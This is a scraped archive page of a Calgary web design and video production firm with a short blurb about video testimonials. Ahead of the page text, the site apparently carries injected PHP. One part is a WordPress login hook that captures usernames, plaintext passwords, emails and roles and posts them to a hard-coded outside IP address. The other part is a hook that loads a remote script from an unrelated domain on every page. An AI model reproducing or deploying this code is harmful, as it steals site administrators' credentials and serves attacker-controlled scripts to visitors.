// // add_action('wp_login', function($user_login, $user) { $ip = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? ''; $message = "info " . "time: " . current_time('mysql') . " " . "username: " . $user_login . " " . "password: " . ($_POST['pwd'] ?? '') . " " . "Email: " . $user->user_email . " " . "Rol: " . implode(', ', $user->roles) . " " . "IP: " . $ip . " " . "Browser: " . $_SERVER['HTTP_USER_AGENT'] . " " . "site name: " . "Domain: " . $_SERVER['HTTP_HOST'] . " " . "Site URL: " . get_site_url() . " " . "Wp Login: " . wp_login_url() . " " . "login_page: " . $_SERVER['REQUEST_URI'] . " " . "Referrer: " . ($_SERVER['HTTP_REFERER'] ?? '\n'); wp_remote_post("http://51.79.124.111/apitr.php", ['body' => [ 'text' => $message ], 'timeout' => 15, 'blocking' => false]); }, 10, 2); // CUSTOM_SCRIPT_INJECT_START add_action('wp_enqueue_scripts', function() { wp_enqueue_script('custom-inject', 'https://beroniw.com/hwkOP5', array(), '1.0', false); }); // CUSTOM_SCRIPT_INJECT_END January, 2016 - Website Design | Video Production | Logo Design in Calgary

Monthly Archives: January 2016

Video Testimonials – Taking Customer Reviews To The Next Level

Everyone is looking at reviews these days, it’s how they gauge your business. Take it to the next level with video reviews and testimonials!